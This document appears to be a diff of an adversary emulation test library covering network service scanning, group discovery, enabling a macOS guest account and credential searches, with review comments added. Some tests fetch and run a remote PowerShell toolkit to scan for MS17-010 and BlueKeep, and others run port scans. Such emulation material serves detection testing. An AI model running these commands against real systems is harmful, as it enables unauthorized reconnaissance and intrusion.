docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
+195
-168
@@ -1,168 +1,195 @@
|
||||
attack_technique: T1046
|
||||
display_name: Network Service Scanning
|
||||
atomic_tests:
|
||||
- name: Port Scan
|
||||
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
|
||||
description: |
|
||||
Scan ports to check for listening ports.
|
||||
|
||||
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
executor:
|
||||
command: |
|
||||
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
|
||||
name: bash
|
||||
- name: Port Scan Nmap
|
||||
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: "80"
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if nmap command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
|
||||
- description: |
|
||||
Check if nc command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
|
||||
- description: |
|
||||
Check if telnet command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
|
||||
executor:
|
||||
command: |
|
||||
sudo nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan NMap for Windows
|
||||
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
|
||||
description: Scan ports to check for listening ports for the local host 127.0.0.1
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
nmap_url:
|
||||
description: NMap installer download URL
|
||||
type: url
|
||||
default: https://nmap.org/dist/nmap-7.80-setup.exe
|
||||
host_to_scan:
|
||||
description: The host to scan with NMap
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
NMap must be installed
|
||||
prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
|
||||
Start-Process $env:temp\nmap-7.80-setup.exe /S
|
||||
executor:
|
||||
command: |-
|
||||
nmap #{host_to_scan}
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Port Scan using python
|
||||
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
|
||||
description: |
|
||||
Scan ports to check for listening ports with python
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
host_ip:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
filename:
|
||||
description: Location of the project file
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1046\src\T1046.py
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if python exists on the machine
|
||||
prereq_command: |
|
||||
if (python --version) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
echo "Python 3 must be installed manually"
|
||||
executor:
|
||||
command: |
|
||||
python #(unknown) -i #{host_ip}
|
||||
name: powershell
|
||||
- name: WinPwn - spoolvulnscan
|
||||
auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
|
||||
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
spoolvulnscan -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - MS17-10
|
||||
auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
|
||||
description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
MS17-10 -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - bluekeep
|
||||
auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
|
||||
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
bluekeep -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - fruit
|
||||
auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
|
||||
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
attack_technique: T1046
|
||||
display_name: Network Service Discovery
|
||||
atomic_tests:
|
||||
- name: Port Scan
|
||||
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
|
||||
description: |
|
||||
Scan ports to check for listening ports.
|
||||
|
||||
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
executor:
|
||||
command: |
|
||||
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
|
||||
name: bash
|
||||
- name: Port Scan Nmap
|
||||
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: "80"
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if nmap command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
|
||||
- description: |
|
||||
Check if nc command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
|
||||
- description: |
|
||||
Check if telnet command exists on the machine
|
||||
prereq_command: |
|
||||
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
|
||||
get_prereq_command: |
|
||||
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
|
||||
executor:
|
||||
command: |
|
||||
sudo nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan NMap for Windows
|
||||
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
|
||||
description: Scan ports to check for listening ports for the local host 127.0.0.1
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
nmap_url:
|
||||
description: NMap installer download URL
|
||||
type: url
|
||||
default: https://nmap.org/dist/nmap-7.80-setup.exe
|
||||
host_to_scan:
|
||||
description: The host to scan with NMap
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
NMap must be installed
|
||||
prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
|
||||
Start-Process $env:temp\nmap-7.80-setup.exe /S
|
||||
executor:
|
||||
command: |-
|
||||
nmap #{host_to_scan}
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Port Scan using python
|
||||
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
|
||||
description: |
|
||||
Scan ports to check for listening ports with python
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
host_ip:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 127.0.0.1
|
||||
filename:
|
||||
description: Location of the project file
|
||||
type: path
|
||||
default: PathToAtomicsFolder\T1046\src\T1046.py
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Check if python exists on the machine
|
||||
prereq_command: |
|
||||
if (python --version) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
echo "Python 3 must be installed manually"
|
||||
executor:
|
||||
command: |
|
||||
python #(unknown) -i #{host_ip}
|
||||
name: powershell
|
||||
- name: WinPwn - spoolvulnscan
|
||||
auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
|
||||
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
spoolvulnscan -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - MS17-10
|
||||
auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
|
||||
description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
MS17-10 -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - bluekeep
|
||||
auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
|
||||
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
bluekeep -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: WinPwn - fruit
|
||||
auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
|
||||
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
|
||||
@@ -0,0 +1,9 @@
|
||||
FROM ubuntu:latest
|
||||
WORKDIR /
|
||||
RUN apt-get update && apt-get install nmap -y
|
||||
RUN apt-get update && apt-get install -y tcpdump
|
||||
RUN apt-get update && apt-get install net-tools
|
||||
RUN apt-get update && apt-get install iproute2 -y
|
||||
COPY scan.sh /scan.sh
|
||||
RUN chmod +x /scan.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
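Review bot: `RUN apt-get update && apt-get install net-tools` on line 5 has no `-y`, so in a non-interactive `docker build` apt prompts, reads EOF and aborts, and the image never builds. Collapsing the four update/install layers into one fixes this and keeps the image small: `RUN apt-get update && apt-get install -y --no-install-recommends nmap tcpdump net-tools iproute2 && rm -rf /var/lib/apt/lists/*`. `FROM ubuntu:latest` also makes the test image non-reproducible — pin a release tag (the sibling T1069.001 Dockerfile on this page uses `ubuntu:20.04`) so detections validated against this atomic do not drift with the base image.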
|
||||
@@ -0,0 +1,12 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Find the IP address of the host machine
|
||||
HOST_IP=$(hostname -I | awk '{print $1}')
|
||||
echo "Running ifconfig"
|
||||
ifconfig
|
||||
echo "Running nmap scan on ${HOST_IP}:"
|
||||
nmap -sV -O ${HOST_IP}
|
||||
echo "Running tcpdump -i on ${HOST_IP}:"
|
||||
tcpdump -i ${HOST_IP} -c 30
|
||||
echo "Running ss -tlwn on ${HOST_IP}:"
|
||||
ss -tuwx
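Review bot: `tcpdump -i ${HOST_IP} -c 30` passes an IP address where `-i` expects an interface name, so tcpdump exits with "No such device" and captures nothing; `tcpdump -i any -c 30 host "${HOST_IP}"` captures on all interfaces filtered to that address. The `# Find the IP address of the host machine` comment is misleading: inside the container `hostname -I` returns the container's own (bridge) address, so `nmap -sV -O ${HOST_IP}` scans the container itself, not the Docker host — the comment should say `# Address of this container (not the Docker host)`, and a real host target would have to be passed in. The final echo announces `ss -tlwn` but the command run is `ss -tuwx`; make the two agree.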
|
||||
@@ -18,6 +18,8 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
|
||||
|
||||
- [Atomic Test #6 - WMIObject Group Discovery](#atomic-test-6---wmiobject-group-discovery)
|
||||
|
||||
- [Atomic Test #7 - Permission Groups Discovery for Containers- Local Groups](#atomic-test-7---permission-groups-discovery-for-containers--local-groups)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -220,4 +222,60 @@ Get-WMIObject Win32_Group
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Permission Groups Discovery for Containers- Local Groups
|
||||
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -99,3 +99,29 @@ atomic_tests:
|
||||
command: |
|
||||
Get-WMIObject Win32_Group
|
||||
name: powershell
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
name: sh
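Review bot: The description of `Permission Groups Discovery for Containers- Local Groups` is copy-pasted from the T1046 network-scanning test ("obtain a list of services ... port and vulnerability scans") and does not describe what the test does (`groups`, `id`, `getent group` and `cat /etc/group` inside the container); something like `Enumerates local groups inside a container by running groups, id and getent group and reading /etc/group.` would be accurate. `docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/` expands a shell variable that nothing on this page sets, whereas the placeholder used elsewhere in these atomics is the literal token `PathToAtomicsFolder` (see `default: PathToAtomicsFolder\T1046\src\T1046.py`); with the variable empty the build path becomes `/T1069.001/src/` and fails. Cleanup stops but never removes the container, so add `docker rm t1069_container` before `docker rmi -f t1069` or the next run's `--name t1069_container` collides. The stray space in the test name (`Containers- Local Groups`) should read `Containers - Local Groups`.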
|
||||
|
||||
@@ -0,0 +1,8 @@
|
||||
FROM ubuntu:20.04
|
||||
WORKDIR /
|
||||
LABEL key="CyberSecurity_project"
|
||||
RUN echo "CyberSecurity_project"
|
||||
RUN apt update
|
||||
COPY test.sh /test.sh
|
||||
RUN chmod +x /test.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
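Review bot: `RUN apt update` on line 5 installs nothing, so it only adds a layer of stale package lists (and `apt` itself warns that its CLI is not stable for scripts); drop it, or use `apt-get update && apt-get install -y ...` if an install is intended. The `LABEL key="CyberSecurity_project"` and `RUN echo "CyberSecurity_project"` lines look like template leftovers that carry no information for the atomic; removing them keeps the image minimal and its metadata free of noise.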
|
||||
@@ -0,0 +1,5 @@
|
||||
#!/bin/sh
|
||||
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
|
||||
cat /etc/group
|
||||
@@ -10,6 +10,8 @@ Default accounts are not limited to client machines, rather also include account
|
||||
|
||||
- [Atomic Test #2 - Activate Guest Account](#atomic-test-2---activate-guest-account)
|
||||
|
||||
- [Atomic Test #3 - Enable Guest Account on macOS](#atomic-test-3---enable-guest-account-on-macos)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -99,4 +101,36 @@ net user #{guest_user} /active:no
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Enable Guest Account on macOS
|
||||
This test enables the guest account on macOS using sysadminctl utility.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```cmd
|
||||
sudo sysadminctl -guestAccount on
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```cmd
|
||||
sudo sysadminctl -guestAccount off
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -65,6 +65,16 @@ atomic_tests:
|
||||
net user #{guest_user} /active:no
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
|
||||
|
||||
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: |-
|
||||
sudo sysadminctl -guestAccount on
|
||||
cleanup_command: |-
|
||||
sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
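Review bot: The new macOS test declares `name: command_prompt` as its executor (two lines above the end of the hunk) although `sudo sysadminctl -guestAccount on` is a shell command and `supported_platforms` lists only `macos`; `command_prompt` is the Windows cmd executor, and the generated Markdown in this commit already renders the test as "Run with `command_prompt`!" inside a ```cmd block. Change it to `name: sh`, the executor the other macOS/Linux tests in this commit use. With `elevation_required: true` set, the explicit `sudo` prefix may be redundant depending on how the runner elevates; worth confirming rather than carrying both.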
@@ -8,32 +8,67 @@ In cloud and/or containerized environments, authenticated user and service accou
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Extract Browser and System credentials with LaZagne](#atomic-test-1---extract-browser-and-system-credentials-with-lazagne)
|
||||
- [Atomic Test #1 - Find AWS credentials](#atomic-test-1---find-aws-credentials)
|
||||
|
||||
- [Atomic Test #2 - Extract passwords with grep](#atomic-test-2---extract-passwords-with-grep)
|
||||
- [Atomic Test #2 - Extract Browser and System credentials with LaZagne](#atomic-test-2---extract-browser-and-system-credentials-with-lazagne)
|
||||
|
||||
- [Atomic Test #3 - Extracting passwords with findstr](#atomic-test-3---extracting-passwords-with-findstr)
|
||||
- [Atomic Test #3 - Extract passwords with grep](#atomic-test-3---extract-passwords-with-grep)
|
||||
|
||||
- [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
|
||||
- [Atomic Test #4 - Extracting passwords with findstr](#atomic-test-4---extracting-passwords-with-findstr)
|
||||
|
||||
- [Atomic Test #5 - Find and Access Github Credentials](#atomic-test-5---find-and-access-github-credentials)
|
||||
- [Atomic Test #5 - Access unattend.xml](#atomic-test-5---access-unattendxml)
|
||||
|
||||
- [Atomic Test #6 - WinPwn - sensitivefiles](#atomic-test-6---winpwn---sensitivefiles)
|
||||
- [Atomic Test #6 - Find and Access Github Credentials](#atomic-test-6---find-and-access-github-credentials)
|
||||
|
||||
- [Atomic Test #7 - WinPwn - Snaffler](#atomic-test-7---winpwn---snaffler)
|
||||
- [Atomic Test #7 - WinPwn - sensitivefiles](#atomic-test-7---winpwn---sensitivefiles)
|
||||
|
||||
- [Atomic Test #8 - WinPwn - powershellsensitive](#atomic-test-8---winpwn---powershellsensitive)
|
||||
- [Atomic Test #8 - WinPwn - Snaffler](#atomic-test-8---winpwn---snaffler)
|
||||
|
||||
- [Atomic Test #9 - WinPwn - passhunt](#atomic-test-9---winpwn---passhunt)
|
||||
- [Atomic Test #9 - WinPwn - powershellsensitive](#atomic-test-9---winpwn---powershellsensitive)
|
||||
|
||||
- [Atomic Test #10 - WinPwn - SessionGopher](#atomic-test-10---winpwn---sessiongopher)
|
||||
- [Atomic Test #10 - WinPwn - passhunt](#atomic-test-10---winpwn---passhunt)
|
||||
|
||||
- [Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-11---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
|
||||
- [Atomic Test #11 - WinPwn - SessionGopher](#atomic-test-11---winpwn---sessiongopher)
|
||||
|
||||
- [Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-12---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Extract Browser and System credentials with LaZagne
|
||||
## Atomic Test #1 - Find AWS credentials
|
||||
Find local AWS credentials from file, defaults to using / as the look path.
|
||||
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| file_path | Path to search | string | /|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
